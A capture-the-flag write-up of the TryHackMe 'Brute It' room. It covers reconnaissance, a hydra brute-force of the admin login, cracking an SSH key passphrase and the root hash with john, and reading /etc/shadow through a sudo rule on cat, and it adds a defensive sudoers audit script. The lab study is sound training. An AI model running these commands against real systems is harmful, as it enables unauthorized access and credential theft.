Brute It
Date: 09 November, 2021
Author: Dhaval Kotak
Room: Brute It
Reconnaissance
nanomite @ zeus in ~/thm/brute_it
⚡️ nmap -A 10.10.87.211 | tee nmap.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-09 12:20 IST
Nmap scan report for 10.10.87.211
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:0e:bf:14:fa:54:b3:5c:44:15:ed:b2:5d:a0:ac:8f (RSA)
| 256 d0:3a:81:55:13:5e:87:0c:e8:52:1e:cf:44:e0:3a:54 (ECDSA)
|_ 256 da:ce:79:e0:45:eb:17:25:ef:62:ac:98:f0:cf:bb:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.48 seconds
How many ports are open?
2
What version of SSH is running?
OpenSSH 7.6p1
What version of Apache is running?
2.4.29
Which Linux distribution is running?
Ubuntu
Search for hidden directories on the web server.
nanomite @ zeus in ~/thm/brute_it
⚡️ gobuster dir -u http://10.10.87.211 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.87.211
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/11/09 12:24:13 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.hta (Status: 403) [Size: 277]
/admin (Status: 301) [Size: 312] [--> http://10.10.87.211/admin/]
/index.html (Status: 200) [Size: 10918]
/server-status (Status: 403) [Size: 277]
===============================================================
2021/11/09 12:27:18 Finished
===============================================================
What is the hidden directory?
/admin
Getting A Shell
We find the login username in an HTML comment while looking at the page source:
<!-- Hey john, if you do not remember, the username is admin -->
Now let's brute force the login page with hydra.
nanomite @ zeus in ~/thm/brute_it
⚡️ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.87.211 http-post-form "/admin/:user=^USER^&pass=^PASS^&Login=Login:Username or password invalid"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-09 12:33:04
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.87.211:80/admin/:user=^USER^&pass=^PASS^&Login=Login:Username or password invalid
[80][http-post-form] host: 10.10.87.211 login: admin password: xavier
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-09 12:33:42
Explanation:
-l admin : specify the username
-P /usr/share/wordlists/rockyou.txt : specify the password dictionary
10.10.87.211 : the target IP
http-post-form : the attack protocol (an HTTP POST login form)
/admin : the path of the login form
user=^USER^&pass=^PASS^ : the POST body of the form; hydra substitutes ^USER^ and ^PASS^ on every attempt
Username or password invalid : the message the page returns when a login fails
What is the user:password of the admin panel?
admin:xavier
Crack the RSA key you found.
nanomite @ zeus in ~/thm/brute_it
⚡️ sudo python3 /opt/john/ssh2John.py id_rsa > hash
nanomite @ zeus in ~/thm/brute_it
⚡️ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
rockinroll (id_rsa)
1g 0:00:00:04 52.40% (ETA: 12:37:06) 0.2487g/s 1888Kp/s 1888Kc/s 1888KC/s hippy3245667
Session aborted
What is John's RSA Private Key passphrase?
rockinroll
User.txt
nanomite @ zeus in ~/thm/brute_it
⚡️ ssh john@10.10.87.211 -i id_rsa
The authenticity of host '10.10.87.211 (10.10.87.211)' can't be established.
ECDSA key fingerprint is SHA256:6/bVnMDQ46C+aRgroR5KUwqKM6J9jAfSYFMQIOKckug.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.87.211' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-118-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Nov 9 07:09:27 UTC 2021
System load: 0.0 Processes: 103
Usage of /: 25.7% of 19.56GB Users logged in: 0
Memory usage: 39% IP address for eth0: 10.10.87.211
Swap usage: 0%
63 packages can be updated.
0 updates are security updates.
Last login: Wed Sep 30 14:06:18 2020 from 192.168.1.106
john@bruteit:~$ ls
user.txt
john@bruteit:~$ cat user.txt
THM{REDACTED}
Web flag
You will get the flag when you log in with the credentials found by hydra.
Privilege Escalation
Find a form to escalate your privileges.
john@bruteit:~$ sudo -l
Matching Defaults entries for john on bruteit:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on bruteit:
(root) NOPASSWD: /bin/cat
We can run cat as root without a password, so let's cat the /etc/shadow file.
john@bruteit:~$ sudo cat /etc/shadow
root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
...
thm:$6$hAlc6HXuBJHNjKzc$NPo/0/iuwh3.86PgaO97jTJJ/hmb0nPj8S/V6lZDsjUeszxFVZvuHsfcirm4zZ11IUqcoB9IEWYiCV.wcuzIZ.:18489:0:99999:7:::
sshd:*:18489:0:99999:7:::
john:$6$iODd0YaH$BA2G28eil/ZUZAV5uNaiNPE0Pa6XHWUFp7uNTp2mooxwa4UzhfC0kjpzPimy1slPNm9r/9soRw8KqrSgfDPfI0:18490:0:99999:7:::
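The sudo rule above is the whole privilege-escalation path: a NOPASSWD grant on /bin/cat lets john read any file as root, /etc/shadow included. The following script is an added example, not part of the original writeup: it parses sudo -l output and classifies each rule so an administrator can audit such grants. The FILE_READERS and SHELL_LIKE sets are illustrative assumptions, and the sample input is the sudo -l output shown above.

```python
import re

# One rule line of `sudo -l` output, e.g. "(root) NOPASSWD: /bin/cat": run-as spec, optional TAG: words, command list.
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')

# Illustrative (not exhaustive) sets: programs that print any file given to them, and programs that yield a shell.
FILE_READERS = {"cat", "tac", "less", "more", "head", "tail", "nl", "base64"}
SHELL_LIKE = {"sh", "bash", "dash", "zsh", "vi", "vim", "python3", "perl", "find"}

def parse_sudo_l(output):
    """Return a list of {runas, nopasswd, cmd} dicts, one per command in the
    'may run the following commands' section of `sudo -l` output."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            rules.append({"runas": m.group("runas"), "nopasswd": nopasswd,
                          "cmd": cmd.strip()})
    return rules

def assess(rule):
    """Classify a rule: 'all', 'read-any-file', 'shell', 'restricted' (fixed
    arguments, so sudo matches only that exact invocation) or 'ok'."""
    parts = rule["cmd"].split()
    if parts[0] == "ALL":
        return "all"
    if len(parts) > 1 and "*" not in rule["cmd"]:
        return "restricted"
    prog = parts[0].rsplit("/", 1)[-1]
    if prog in FILE_READERS:
        return "read-any-file"
    if prog in SHELL_LIKE:
        return "shell"
    return "ok"

# Sample input: the sudo -l output from the box shown above.
SAMPLE_SUDO_L = r"""Matching Defaults entries for john on bruteit:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on bruteit:
    (root) NOPASSWD: /bin/cat
"""
```

Pinning the arguments in sudoers (for example /bin/cat /var/log/syslog) makes sudo match only that exact invocation, which the script reports as 'restricted' rather than 'read-any-file'.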
Using john to crack the root hash
nanomite @ zeus in ~/thm/brute_it
⚡️ john root-hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
football (root)
1g 0:00:00:04 DONE 2/3 (2021-11-09 12:49) 0.2309g/s 711.3p/s 711.3c/s 711.3C/s 123456..john
Use the "--show" option to display all of the cracked passwords reliably
Session completed
What is the root password?
football
root.txt
root@bruteit:/home/john# cd /root
root@bruteit:~# ls
root.txt
root@bruteit:~# cat root.txt
THM{REDACTED}
root@bruteit:~#